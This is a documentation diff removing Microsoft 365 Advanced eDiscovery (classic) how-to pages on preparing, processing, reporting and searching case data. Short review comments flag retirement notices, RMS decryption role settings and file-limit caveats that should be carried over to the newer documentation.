-> As we continue to invest in newer versions of Advanced eDiscovery, we are announcing the retirement of Advanced eDiscovery, also known as *Advanced eDiscovery (classic)* or *Advanced eDiscovery v1.0*. If you're still using Advanced eDiscovery v1.0, please transition to [Advanced eDiscovery v2.0](overview-ediscovery-20.md) (also known as the *Advanced eDiscovery solution in Microsoft 365*) as soon as possible. Advanced eDiscovery 2.0 contains similar functionality found in Advanced eDiscovery v1.0, but also offers many new features such as custodian management, communications management, and review sets. To learn more about the retirement of Advanced eDiscovery v1.0, see [Retirement of legacy eDiscovery tools](legacy-ediscovery-retirement.md#advanced-ediscovery-v10).
-
-## Step 1: Prepare data for Advanced eDiscovery
-
-To analyze data with Advanced eDiscovery, you can use the results of a Content Search that you run in the Microsoft 365 Security &amp; Compliance Center (listed on the **Content search** page in the Microsoft 365 Security &amp; Compliance Center) or a search associated with an eDiscovery case (listed on the **eDiscovery** page in the Security &amp; Compliance Center).
-
-For the detailed steps on preparing search results for analysis in Advanced eDiscovery, see [Prepare search results for Advanced eDiscovery](prepare-search-results-for-advanced-ediscovery.md).
-
-> [!NOTE]
-> If you have data outside of Microsoft 365 and want to import it to Microsoft 365 so that you can prepare and analyze it in Advanced eDiscovery, a see [Overview of importing PST files to Microsoft 365](https://docs.microsoft.com/microsoft-365/compliance/importing-pst-files-to-office-365) and [Archiving third-party data](https://www.microsoft.com/?ref=go).
-
-## Step 2: Load search result data in to a case in Advanced eDiscovery
-
-After you prepare the search results in the Security &amp; Compliance Center for analysis, the next step is to load the search results in to a case in Advanced eDiscovery. For more detailed information, see [Run the Process module](run-the-process-module-in-advanced-ediscovery.md).
-
-1. Go to [https://protection.office.com](https://protection.office.com).
-
-2. Sign in using your work or school account.
-
-3. In the Security &amp; Compliance Center, click **Search &amp; investigation** \> **eDiscovery** to display the list of cases in your organization.
-
-4. Click **Open** next to the case that you want to load data in to in Advanced eDiscovery.
-
-5. On the **Home** page for the case, click **Switch to Advanced eDiscovery**.
-
- ![Click Switch to Advanced eDiscovery to open the case in Advanced eDiscovery](../media/8e34ba23-62e3-4e68-a530-b6ece39b54be.png)
-
- The **Connecting to Advanced eDiscovery** progress bar is displayed. When you're connected to Advanced eDiscovery, a list of containers is displayed on the setup page for the case.
-
- ![The case is displayed in Advanced eDiscovery](../media/8036e152-70dc-4bb7-9379-61c1ed8326b4.png)
-
- These containers represent the search results that you prepared for analysis in Advanced eDiscovery in Step 1. Note that the name of the container has the same name as the Content Search in the case in the Security &amp; Compliance Center. The containers in the list are the ones that you prepared. If a different user prepared search results for Advanced eDiscovery, the corresponding containers won't be included in the list.
-
-6. To load the search result data from a container in to the case in Advanced eDiscovery, select a container and then click **Process**.
-
-After the search results from the Security &amp; Compliance Center are added to the case in Advanced eDiscovery, the next step is to use the tools in Advanced eDiscovery to analyze and cull the data that's relevant to the case.
-
-## See also
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
-
-[Set up users and cases](set-up-users-and-cases-in-advanced-ediscovery.md)
-
-[Analyzing case data](analyze-case-data-with-advanced-ediscovery.md)
-
-[Managing Relevance setup](manage-relevance-setup-in-advanced-ediscovery.md)
-
-[Using the Relevance module](use-relevance-in-advanced-ediscovery.md)
-
-[Exporting case data](export-case-data-in-advanced-ediscovery.md)
-
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/prepare-search-results-for-advanced-ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/prepare-search-results-for-advanced-ediscovery.md deleted file mode 100644
@@ -1,121 +0,0 @@
-title: "Prepare search results for Advanced eDiscovery"
-f1.keywords:
-- NOCSH
-ms.author: markjjo
-author: markjjo
-manager: laurawi
-audience: Admin
-ms.topic: how-to
-f1_keywords:
-- 'ms.o365.cc.CustomizeExportWithZoom'
-ms.service: O365-seccomp
-localization_priority: Normal
-ms.collection:
-- Strat_O365_IP-- M365-security-compliance
-search.appverid:
-- MOE150-- MET150
-ms.assetid: 0b6fac2d-8627-4b05-9df0-03609db6248b
-description: "Learn how to prepare the results of a Content Search in the Security & Compliance Center for further analysis with the Advanced eDiscovery tool."
-ms.custom: seo-marvel-apr2020
-
-# Prepare search results for Advanced eDiscovery (classic)
-
-> [!IMPORTANT]
-> As we continue to invest in newer versions of Advanced eDiscovery, we are announcing the retirement of Advanced eDiscovery, also known as *Advanced eDiscovery (classic)* or *Advanced eDiscovery v1.0*. If you're still using Advanced eDiscovery v1.0, please transition to [Advanced eDiscovery v2.0](overview-ediscovery-20.md) (also known as the *Advanced eDiscovery solution in Microsoft 365*) as soon as possible. Advanced eDiscovery 2.0 contains similar functionality found in Advanced eDiscovery v1.0, but also offers many new features such as custodian management, communications management, and review sets. To learn more about the retirement of Advanced eDiscovery v1.0, see [Retirement of legacy eDiscovery tools](legacy-ediscovery-retirement.md#advanced-ediscovery-v10).
-
-After a search that's associated with an eDiscovery case in the Security & Compliance Center is successfully run, you can prepare the search results for further analysis with Advanced eDiscovery, which lets you analyze large, unstructured data sets and reduce the amount of data that's relevant to a legal case. Advanced eDiscovery features include:
-
-- **Optical character recognition** - When you prepare search results for Advanced eDiscovery, optical character recognition (OCR) functionality automatically extracts text from images, and includes this with the search results that are loaded in to Advanced eDiscovery for analysis. OCR is supported for loose files, email attachments, and embedded images. This allows you to apply the text analytic capabilities of Advanced eDiscovery (near-duplicates, email threading, themes, and predictive coding) to the text content in image files. Advanced eDiscovery OCR supports the following formats for image files:-
- - GIF
- - JPEG
- - JPG
- - PNG
- - TIFF
-
-- **Near-duplicate detection** - Lets you structure your data review more efficiently, so one person reviews a group of similar documents. This helps prevent multiple reviewers from having to view different versions of the same document.
-
-- **Email threading** - Helps you identify the unique messages in an email thread so you can focus on only the new information in each message. In an email thread, the second message contains the first message. Likewise, later messages contain all the previous messages. Email threading removes the need to review every message in its entirety in an email thread.
-
-- **Themes** - Help you get valuable insight about your data beyond just keyword search statistics. Themes help investigations by grouping related documents so you can look at the documents in context. When using themes, you can view the related themes for a set of documents, determine any overlap, and then identify cross-sections of related data.
-
-- **Predictive coding** - Lets you train the system on what you're looking for, by allowing you to make decisions (about whether something is relevant or not) on a small set of documents. Advanced eDiscovery then applies that learning (based on your guidance) when analyzing all of the documents in the data set. Based on that learning, Advanced eDiscovery provides a relevance ranking so you can decide which documents to review based on what document are the most likely to be relevant to the case.
-
-- **Exporting data for review applications** - You can export data from Advanced eDiscovery and Microsoft 365 after you've completed your analysis and reduced the data set. The export package includes a CSV file that contains the properties from the exported content and analytics metadata. This export package can then be imported to an eDiscovery review application.
-
-## Get licenses and permissions
--- To analyze a user's data using Advanced eDiscovery, the user (the custodian of the data) must be assigned an Office 365 E5 license. Alternatively, users with an Office 365 E1 or E3 license can be assigned an Advanced eDiscovery standalone license. Administrators and compliance officers who are assigned to cases and use Advanced eDiscovery to analyze data don't need an E5 license.
-
-- You have to be an eDiscovery Manager or an eDiscovery Administrator in the Security & Compliance Center to prepare search results for Advanced eDiscovery. An eDiscovery Manager is a member of the eDiscovery Manager role group. An eDiscovery Administrator is also member of the eDiscovery Manager role group, but has been assigned additional eDiscovery privileges. For instructions about assigning eDiscovery Administrator permissions, see Step 1 in [eDiscovery cases](ediscovery-cases.md#step-1-assign-ediscovery-permissions-to-potential-case-members).
-
-## Step 1: Prepare search results for Advanced eDiscovery
-
-You can prepare the results of a search that's associated with an eDiscovery case. When you prepare search results for Advanced eDiscovery, the data is uploaded and temporarily stored in a unique Windows Azure storage area in the Microsoft cloud. It's at this point that the OCR functionality extracts text from images in the search results. In [Step 2](#step-2-add-the-search-results-data-to-the-case-in-advanced-ediscovery), this text and the other search results data is loaded in to the case in Advanced eDiscovery.
-
-1. In the Security & Compliance Center, click **eDiscovery** \> **eDiscovery** to display the list of cases in your organization.
-
-2. Click **Open** next to the case that you want to prepare search results for analysis in Advanced eDiscovery.
-
-3. On the **Home** page for the case, click **Search**, and then select the search.
-
-4. In the details pane, under **Analyze results with Advanced eDiscovery**, click **Prepare results for analysis**.
-
- > [!NOTE]
- > If the search results are older than 7 days, you will be prompted to update the search results.
-
-5. On the **Prepare results for analysis** page, do the following:
-
- - Choose to prepare indexed items, indexed and unindexed items, or only unindexed items for analysis in Advanced eDiscovery.
-
- - Choose whether to include all versions of documents found on SharePoint that met the search criteria. This option appears only if the content sources for the search includes sites.
-
- - Specify whether you want a notification message sent (or copied) to a person when the preparation process is completed and the data is ready to be processed in Advanced eDiscovery.
-
-6. Click **Prepare**.
-
- The search results are prepared for analysis with Advanced eDiscovery.
-
-7. In the details pane, click **Check preparation status** to display information about the preparation process. When the preparation process is finished, you can go to the case in Advanced eDiscovery to process the data for analysis.
-
-## Step 2: Add the search results data to the case in Advanced eDiscovery
-<a name="step2"> </a>
-
-When the preparation is finished, the next step is to go to Advanced eDiscovery and load the search results data (which have been uploaded to an Azure storage area in the Microsoft cloud ) to the case in Advanced eDiscovery. As previously explained, to access Advanced eDiscovery you have to be an eDiscovery Administrator in the Security & Compliance Center or an administrator in Advanced eDiscovery.
-
-> [!NOTE]
-> The time it takes for the data from the Security & Compliance Center to be available to add to a case in Advanced eDiscovery varies, depending on the size of the results from the eDiscovery search.
-
-1. In the Security & Compliance Center, click **eDiscovery** \> **eDiscovery** to display the list of cases in your organization.
-
-2. Click **Open** next to the case that you want to load data in to in Advanced eDiscovery.
-
-3. On the **Home** page for the case, click **Switch to Advanced eDiscovery**.
-
- ![Click Switch to Advanced eDiscovery to open the case in Advanced eDiscovery](../media/8e34ba23-62e3-4e68-a530-b6ece39b54be.png)
-
- The **Connecting to Advanced eDiscovery** progress bar is displayed. When you're connected to Advanced eDiscovery, a list of containers is displayed on the setup page for the case.
-
- ![The case is displayed in Advanced eDiscovery](../media/8036e152-70dc-4bb7-9379-61c1ed8326b4.png)
-
- These containers represent the search results that you prepared for analysis in Advanced eDiscovery in Step 1. Note that the name of the container has the same name as the search in the case in the Security & Compliance Center. The containers in the list are the ones that you prepared. If a different user prepared search results for Advanced eDiscovery, the corresponding containers won't be included in the list.
-
-4. To load the search result data from a container in to the case in Advanced eDiscovery, select a container and then click **Process**.
-
-## Next steps
-
-After the results of an eDiscovery search are added to a case, the next step is to use the Advanced eDiscovery tools to analyze the data and identify the content that's responsive to a specific legal case. For information about using Advanced eDiscovery, see [Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md).
-
-## More information
-
-Any RMS-encrypted email messages that are included in the search results will be decrypted when you prepare them for analysis in Advanced eDiscovery. This decryption capability is enabled by default for members of the eDiscovery Manager role group. This is because the RMS Decrypt management role is assigned to this role group. Keep the following things in mind about decrypting email messages:
-
-- Currently, this decryption capability doesn't include encrypted content from SharePoint and OneDrive for Business sites. Only RMS-encrypted email messages will be decrypted when you export them.
-
-- If an RMS-encrypted email message has an attachment (such as a document or another email message) that's also encrypted, only the top-level email message will be decrypted.
-
-- If you need to prevent someone from decrypting RMS-encrypted messages when preparing search results for analysis in Advanced eDiscovery, you'll have to create a custom role group (by copying the built-in eDiscovery Manager role group) and then remove the RMS Decrypt management role from the custom role group. Then add the person who you don't want to decrypt messages as a member of the custom role group.
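Review bot: the "More information" section at the end of this deleted file carries access-control guidance that should not disappear with the page. It states that RMS-encrypted email is decrypted during preparation, that this is enabled by default because the RMS Decrypt management role is assigned to the eDiscovery Manager role group, and that withholding it requires a custom role group copied from eDiscovery Manager with that role removed. Before the file is removed, confirm that the Advanced eDiscovery v2.0 documentation states the equivalent behaviour and procedure, or move this text there, so administrators restricting decryption rights for case members still have a reference.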
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/quick-setup-for-advanced-ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/quick-setup-for-advanced-ediscovery.md deleted file mode 100644
@@ -1,75 +0,0 @@
-title: "Quick setup for Advanced eDiscovery"
-f1.keywords:
-- NOCSH
-ms.author: markjjo
-author: markjjo
-manager: laurawi
-titleSuffix: Office 365
-ms.date: 9/14/2017
-audience: Admin
-ms.topic: article
-ms.service: O365-seccomp
-localization_priority: Priority
-search.appverid:
-- MOE150-- MET150
-ms.assetid: d7ccd944-9698-41c7-a21b-677dc62973c4
-description: "Learn how to access Advanced eDiscovery from the Security &amp; Compliance Center and review the typical workflow for using Advanced eDiscovery."
-
-# Quick setup Advanced eDiscovery (classic)
-
-> [!IMPORTANT]
-> As we continue to invest in newer versions of Advanced eDiscovery, we are announcing the retirement of Advanced eDiscovery, also known as *Advanced eDiscovery (classic)* or *Advanced eDiscovery v1.0*. If you're still using Advanced eDiscovery v1.0, please transition to [Advanced eDiscovery v2.0](overview-ediscovery-20.md) (also known as the *Advanced eDiscovery solution in Microsoft 365*) as soon as possible. Advanced eDiscovery 2.0 contains similar functionality found in Advanced eDiscovery v1.0, but also offers many new features such as custodian management, communications management, and review sets. To learn more about the retirement of Advanced eDiscovery v1.0, see [Retirement of legacy eDiscovery tools](legacy-ediscovery-retirement.md#advanced-ediscovery-v10).
-
-This setup section shows an Microsoft 365 Security &amp; Compliance Center eDiscovery manager how to get started with Advanced eDiscovery. A working knowledge of both is assumed.
-
-## Accessing a case in Advanced eDiscovery
-
-You access Advanced eDiscovery from the Security &amp; Compliance Center. You have to be a member of an eDiscovery case in the Security &amp; Compliance Center to access the case in Advanced eDiscovery. For instructions about assigning eDiscovery case permissions and adding users to an eDiscovery case, see [Manage eDiscovery cases in Office 365](ediscovery-cases.md).
-
-To go to a case in Advanced eDiscovery:
-
-1. [Go to the Security &amp; Compliance Center](go-to-the-securitycompliance-center.md) .
-
-2. In the Security &amp; Compliance Center, click **Search &amp; investigation** \> **eDiscovery** to display the list of cases in your organization.
-
-3. On the **eDiscovery** page, click **Open** next to the case that you want to go to in Advanced eDiscovery.
-
-4. On the **Home** page for the case, click **Switch to Advanced eDiscovery**.
-
- The **Connecting to Advanced eDiscovery** progress bar is displayed. When you're connected, the case is opened in Advanced eDiscovery.
-
-## Workflow
-
-The following diagram illustrates the common workflow for managing and using eDiscovery cases in the Security &amp; Compliance Center and Advanced eDiscovery.
-
-![Diagram shows the Advanced eDiscovery workflow of four phases in setup, including setting up users &amp; cases, identifying case data, exporting, and processing, and then the phases of analysis and export to local machine.](../media/76589ccc-789d-4581-b3a8-98d339b05979.png)
-
-This setup section describes the first four steps in the workflow. For a description of the other steps in the workflow, see the following.
-
-## Analyze
-
-[Analyzing case data](analyze-case-data-with-advanced-ediscovery.md) Identifies and organizes the files by various parameters, enables the use of Themes, and displays the results. Analyze functionality can be customized by the user in order to achieve enhanced results.
-
-## Relevance Setup and Relevance
-
-[Relevance Setup](manage-relevance-setup-in-advanced-ediscovery.md) and [Using the Relevance module](use-relevance-in-advanced-ediscovery.md) Enables assessment and relevance training based on a random sample of files and uses them to apply decisions to the predictive coding process. Calculates and displays interim results while monitoring statistical validity of the process. Displays the results to facilitate in making review decisions.
-
-## Export
-
-[Exporting case data](export-case-data-in-advanced-ediscovery.md) Enables the exporting of Advanced eDiscovery content and results for external review.
-
-## Report
-
-[Running reports](run-reports-in-advanced-ediscovery.md) Enables the generation of selected reports related to Advanced eDiscovery processing.
-
-## See also
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
-
-[Setting up users and cases](set-up-users-and-cases-in-advanced-ediscovery.md)
-
-[Preparing data](prepare-data-for-advanced-ediscovery.md)
-
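Review bot: The retirement notice at the top of this deleted article is the only text in the hunk that tells a v1.0 user where to go next (`overview-ediscovery-20.md` and `legacy-ediscovery-retirement.md#advanced-ediscovery-v10`), and deleting the file removes it together with the access steps. Nothing in the visible change shows a redirect for this article's URL; please confirm one is added that lands on the retirement article, so bookmarks and inbound links do not dead-end while v1.0 cases are still being transitioned.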
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/run-reports-in-advanced-ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/run-reports-in-advanced-ediscovery.md deleted file mode 100644
@@ -1,43 +0,0 @@
-title: "Run reports in Advanced eDiscovery"
-f1.keywords:
-- NOCSH
-ms.author: markjjo
-author: markjjo
-manager: laurawi
-titleSuffix: Office 365
-ms.date: 9/14/2017
-audience: Admin
-ms.topic: article
-ms.service: O365-seccomp
-localization_priority: Normal
-search.appverid:
-- MOE150-- MET150
-ms.assetid: b270243e-99a0-4c34-9b21-acb1512d56c6
-description: Learn how to run a report for your selected process and then download its .csv file in Advanced eDiscovery.
-ms.custom: seo-marvel-apr2020
-
-# Run reports in Advanced eDiscovery (classic)
-
-> [!NOTE]
-> Advanced eDiscovery requires an Office 365 E3 with the Advanced Compliance add-on or an E5 subscription for your organization. If you don't have that plan and want to try Advanced eDiscovery, you can [sign up for a trial of Office 365 Enterprise E5](https://go.microsoft.com/fwlink/p/?LinkID=698279).
-
-This topic describes how to run reports in Advanced eDiscovery.
-
-## Running reports
-
-You can download a .csv file with a report for the selected process.
-
-1. In the **Reports** tab, select an option from the **Report name** list. Select from three **Report name** options: **Relevance decide**, **Themes list,** or **Tagged files**.
-
- ![eDiscovery Analytics Reports](../media/f16aee7a-508f-4acc-99bc-a2c8dec01312.png)
-
-2. Available parameters, and sort and filter options can be set, depending on the selected report.
-
-3. Click **Download CSV**. The requested report is generated and downloaded.
-
-## Related topics
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/run-the-process-module-and-load-data-in-advanced-ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/run-the-process-module-and-load-data-in-advanced-ediscovery.md deleted file mode 100644
@@ -1,85 +0,0 @@
-title: "Run the Process module and load data in Advanced eDiscovery"
-f1.keywords:
-- NOCSH
-ms.author: markjjo
-author: markjjo
-manager: laurawi
-titleSuffix: Office 365
-ms.date: 9/14/2017
-audience: Admin
-ms.topic: article
-ms.service: O365-seccomp
-localization_priority: Normal
-search.appverid:
-- MOE150-- MET150
-ms.assetid: c87bb0e5-301c-4d1d-958e-aabeb7990f44
-description: "Learn how to use the Security &amp; Compliance Center to access Advanced eDiscovery and run the Process module for a case."
-ms.custom: seo-marvel-apr2020
-
-# Run the Process module and load data in Advanced eDiscovery (classic)
-
-> [!NOTE]
-> Advanced eDiscovery requires an Office 365 E3 with the Advanced Compliance add-on or an E5 subscription for your organization. If you don't have that plan and want to try Advanced eDiscovery, you can [sign up for a trial of Office 365 Enterprise E5](https://go.microsoft.com/fwlink/p/?LinkID=698279).
-
-This section describes the functionality of the Advanced eDiscovery Process module.
-
-In addition to file data, metadata such as file type, extension, location or path, creation date and time, author, custodian, and subject, can be loaded into Advanced eDiscovery and saved for each case. Some metadata is calculated by Advanced eDiscovery, for example, when native files are loaded.
-
-Advanced eDiscovery provides system metadata values, such as Near-duplicate groupings or Relevance scores. Other metadata, such as file annotations, can be added by the Administrator.
-
-## Running Process
-
-> [!NOTE]
-> Batch numbers are assigned to a file during Process to allow the tracking of files. The batch number also enables identification of Process batches for reprocessing options. Additional filters are available for filtering by batch number and sessions.
-
-Perform the following steps to run Process.
-
-1. [Open the Security &amp; Compliance Center](go-to-the-securitycompliance-center.md) .
-
-2. Go to **Search &amp; investigation** \> **eDiscovery** and then click **Go to Advanced eDiscovery**.
-
-3. In Advanced eDiscovery, select the appropriate case in the displayed **Cases** page and click **Go to case**.
-
-4. In **Prepare** \> **Process** \> **Setup**, select a container from the list of available containers.
-
- ![Click Process to add the search results to the case](../media/50bdc55c-d378-4881-b302-31ef785fa359.png)
-
-5. Click **Advanced settings...** if you want to add the container as seed files or as pre-tagged files.
-
- Use seed files to accelerate training for issues with low richness (usually 2%, or less). For seed files, it is recommended that you select a variety of distinctly relevant files and process about 20-50 seeds per issue (too many seed files can skew Relevance results). Seed files should be reviewed by the same person who will train the issue.
-
- Use pre-tagged files to automate Relevance training. You should tag at least 1,500 files, and keep the proportion of relevant to non-relevant files the same as in the collection added to Relevance. These files should be manually tagged, and you should be confident in the quality of tagging.
-
- ![Screenshot of Advanced settings page for processing batch files](../media/3c25cb78-4484-41e5-bd34-3753c7ab6cf2.jpg)
-
- - In the **Seed** section:
-
- Choose **Mark as seed files** to mark the container as seed files. You also need choose to assign them per issue from the **For issue** drop-down. Choose either **Relevant** or **Not relevant** from the **Tag** drop-down.
-
- > [!NOTE]
- > Once you set files as **Seed**, you cannot mark them as **Pre-tagged**.
-
- - In the **Pre-tagged files** section:
-
- Choose **Mark as pre-tagged files** to mark the container as pre-tagged files. You also need to assign them per issue from the **For issue** drop-down. Choose either **Relevant** or **Not relevant** from the **Tag** drop-down.
-
- > [!NOTE]
- > Once you set files as **Pre-tagged**, you cannot mark them as **Seed**.
-
- - In the **Email tagging** section. set which part of a processed email are to be marked as Seed or Pre-tagged.
-
-6. To begin, click **Process**. When completed, the Process results are displayed.
-
-7. (Optional) If you need to assign data sources to a specific custodian, you can add and edit custodian names in **Custodians** \> **Manage** and assign custodians in **Custodians** \> **Assign**.
-
-If you add to the case, then you can process again.
-
-## Related topics
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
-
-[Viewing Process module results](view-process-module-results-in-advanced-ediscovery.md)
-
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/run-the-process-module-in-advanced-ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/run-the-process-module-in-advanced-ediscovery.md deleted file mode 100644
@@ -1,77 +0,0 @@
-title: "Run the Process module in Advanced eDiscovery"
-f1.keywords:
-- NOCSH
-ms.author: markjjo
-author: markjjo
-manager: laurawi
-titleSuffix: Office 365
-ms.date: 9/14/2017
-audience: Admin
-ms.topic: article
-ms.service: O365-seccomp
-localization_priority: Normal
-search.appverid:
-- MOE150-- MET150
-ms.assetid: dbc1e251-0596-443b-ac9b-f398ba955b73
-description: "Learn the guidelines for preparing case files of data for analysis with Advanced eDiscovery."
-
-# Run the Process module in Advanced eDiscovery (classic)
-
-Case files are loaded into the Advanced eDiscovery during **Prepare** \> **Process**.
-
-> [!NOTE]
-> Advanced eDiscovery requires an Office 365 E3 with the Advanced Compliance add-on or an E5 subscription for your organization. If you don't have that plan and want to try Advanced eDiscovery, you can [sign up for a trial of Office 365 Enterprise E5](https://go.microsoft.com/fwlink/p/?LinkID=698279).
-
-## Guidelines: Preparing data for Advanced eDiscovery
--- **Quality**: Clearly identify the case file population pertinent to the case.
-
-- **Loads**: Load the files into a location that is accessible to Advanced eDiscovery.
-
-- **File ID**: A unique file identifier in Advanced eDiscovery. If no file identifier is imported, Advanced eDiscovery automatically generates the ID. If you map the ID in a subsequent Process load, and map a different path than in the initial Process load, Advanced eDiscovery will replace the path (rather than add a new file entry). The ID can be used as a reference in the Export process. The ID value should not be "-1".
-
-- **MD5**: This signature is used to differentiate between files (two files are not considered exact duplicates unless they have the same MD5). By default, Advanced eDiscovery calculates the MD5 of files. When the loaded files are text files, it is recommended to load and map the original MD5 value instead of calculating it in Advanced eDiscovery.
-
-- **File type and name**:
-
- - Advanced eDiscovery can process files of various formats and extract loaded native files into a standard format, such as \*.TXT, HTML, or .XML. Processing of text files is faster than native files. Extracted text files are stored in the case folder.
-
- - Do not load files that cannot be extracted, such as system files or graphic images. These files may delay processing.
-
- - Verify that file names are significantly named and paths are correct.
-
-- **File path**: Advanced eDiscovery can load files with path lengths up to 400 characters.
-
-- **Text extraction**: When extracting text from native files, in addition to normal text, the following are also extracted: hidden text (Excel and .doc), hidden columns (Excel), track changes (.doc), speaker notes (.ppt), embedded objects (for example, Excel objects in a .ppt). These can be viewed in the Text editor.
-
-- **Ignore Text**: This optional feature is defined after Process is run and before Analyze. Ignore text should be used with caution because its use may reduce the performance of file analysis.
-
-- **Multilingual text**: Advanced eDiscovery does not currently handle multilingual names for tags, custodian, and issues.
-
-- **Metadata**: Determine if there is metadata that you want to save in the case database for future reference, such as date range, file size, file type, custodian, and subject. Metadata can be loaded after files were already loaded without rerunning the inventory or adding reprocessing overhead.
-
- - If the files were originally loaded by path, map the path column when later importing metadata. It is possible to refer to the file by ID and to map a different path. This is a useful scenario when the file paths change.
-
- - If the files were originally loaded by File ID, map the ID column when loading metadata. Referring to the file by path (instead of ID) will cause files to be re-loaded with a different ID. Advanced eDiscovery creates copies of the files rather that loading metadata of the existing files.
-
-- **Families**: It is not possible to load a family without its parent (head of family).
-
-- **File size**: There is no limitation on the size of files loaded to Advanced eDiscovery. For analysis (Analyze, Relevance, etc.), the limit is 5,242,880 characters of extracted text. Larger files are ignored (for example, in Relevance, files do not participate in the Relevance training process and do not receive a Relevance score after batch calculation).
-
-- **File quantity**: There is no recommended limit on the number of files that can be handled in a single case. Performance depends on the resources of your system.
-
-## Filtering files
-
-A user-defined label can be associated with a set of files to exclude them from Process or other tasks. Each Process session is associated with a batch ID. Although the batch ID is not visible to the expert in Relevance, this can be done using a search utility, by adding a filter for the current batch and tagging all appropriate files with a user-defined label.
-
-## See also
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
-
-[Running the Process module and loading data](run-the-process-module-and-load-data-in-advanced-ediscovery.md)
-
-[Viewing Process module results](view-process-module-results-in-advanced-ediscovery.md)
-
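Review bot: The **File size** and **Metadata** bullets in the guidelines list state limits that affect how complete a review is: files whose extracted text exceeds 5,242,880 characters are ignored by analysis and receive no Relevance score, and loading metadata by path for files originally loaded by File ID creates copies with a different ID. Deleting the file drops those caveats for anyone still working a classic case; consider carrying them into the retirement article, or confirm that the v2.0 articles document the equivalent limits, before this text is removed.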
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/search-and-tagging https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/search-and-tagging.md deleted file mode 100644
@@ -1,87 +0,0 @@
-title: "Search and Tagging"
-f1.keywords:
-- NOCSH
-ms.author: markjjo
-author: markjjo
-manager: laurawi
-titleSuffix: Office 365
-audience: ITPro
-ms.topic: article
-ms.service: O365-seccomp
-localization_priority: Normal
-search.appverid:
-- MET150
-ms.assetid: 22f5adad-1bc0-460d-94a9-8732929f5b99
-description: "In Advanced eDiscovery, the Search and Tagging module enables you to search, preview, and organize the documents in your case. Currently, this module is in beta."
-ms.custom: seo-marvel-apr2020
-
-# Search and Tagging
-
-In Advanced eDiscovery, the Search and Tagging module enables you to search, preview, and organize the documents in your case. Currently, this module is in beta. For a brief demonstration of searching and tagging, see the [Manage your data with Advanced eDiscovery](https://www.youtube.com/watch?v=VaPYL3DHP6I) video.
-
-> [!NOTE]
-> Advanced eDiscovery requires an Office 365 E3 with the Advanced Compliance add-on or an E5 subscription for your organization. If you don't have that plan and want to try Advanced eDiscovery, you can [sign up for a trial of Office 365 Enterprise E5](https://go.microsoft.com/fwlink/p/?LinkID=698279).
-
-## Search the documents in your case
-
-After you have processed documents in an Advanced eDiscovery case (and optionally run the Analyze or Relevance module), you can use the Search and Tagging to search documents and then organize them by applying case-specific tags (also called labels). You can define a search query using the provided condition cards or by using a KQL-like query language in the Keywords condition card. Common KQL syntax, such as AND, OR, NOT, and NEAR(n) are supported, as well as trailing multi-character wildcard (*).
-
-The following table lists the properties that you can search for using a KQL keyword query. Alternatively, you can use a condition card for in the Advanced eDiscovery Search tool to add a condition (for selected properties) to a search query.
-
-|**Property**|**Description**|
-|:-----|:-----|
-|**caselabel** <br/> | The name of the tag created/applied when a document is tagged. <br/> |
-|**custodian** <br/> | The custodian associated with a document; subject to limitations. <br/> |
-|**date** <br/> | Sent date for email; the modified date for site documents. <br/> |
-|**fileid** <br/> | The File ID within the case. <br/> |
-|**filetype** <br/> | The native file extension. <br/> |
-|**fileclass** <br/> | Email, document, or attachment. <br/> |
-|**senderauthor** <br/> | The sender for email; the author for site documents. <br/> |
-|**size** <br/> | The size of the file in KB. <br/> |
-|**subjecttitle** <br/> | The subject for email; the title for site documents. <br/> |
-|**bcc** <br/> | The Bcc field of an email. <br/> |
-|**cc** <br/> | The Cc field of an email. <br/> |
-|**participants** <br/> | The email address of all participants in an email thread, including for missing links. <br/> |
-|**received** <br/> | The date an email was received. <br/> |
-|**recipients** <br/> | Recipients of an email, included on the To, Cc, or Bcc fields. <br/> |
-|**sender** <br/> | The sender of an email. <br/> |
-|**lastmodifieddate** <br/> | The last modified date of a site document. <br/> |
-|**sent** <br/> | The sent date of an email. <br/> |
-|**to** <br/> | The recipient listed in the To field of an email. <br/> |
-|**author** <br/> | The author of a site document. <br/> |
-|**title** <br/> | The title of a site document. <br/> |
-|**dominanttheme**\* <br/> | The dominant theme of an item. <br/> |
-|**themeslist**\* <br/> | Themes that are associated with an item. <br/> |
-|**readpercentile_[issuenum]**\*\* <br/> | The read percentile of an item, for the issue defined by [issuenum]. <br/> |
-|**relevancescore_[issuenum]**\*\* <br/> | The relevance score of an item, for the issue defined by [issuenum]. <br/> |
-|**relevancetag_[tagname]**\*\* <br/> | If an item has been manually tagged for relevance, the tag defined by [tagname]. <br/> |
-|||
-
-\* Only available if the Themes module has been run.
-
-\*\* Only available if the Relevance module has been run.
-
-Alternatively, you can use a condition card in the Advanced eDiscovery Search tool to add a condition (for selected properties) to a search query. The following screenshot shows the conditions that can be added to a query. The **Group** column indicates whether the property applies to email, site documents, or both (indicated by the value *Common*). This column also identifies the searchable properties that are available after you run the Relevance module.
-
-![Search conditions in the Advanced eDiscovery search tool](../media/AeDSearchConditions.png)
-
-For more information about searchable properties, see [Keyword queries and search conditions](keyword-queries-and-search-conditions.md).
-
-## Related topics
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
-
-[Understanding Assessment in Relevance](assessment-in-relevance-in-advanced-ediscovery.md)
-
-[Tagging and Assessment](tagging-and-assessment-in-advanced-ediscovery.md)
-
-[Tagging and Relevance training](tagging-and-relevance-training-in-advanced-ediscovery.md)
-
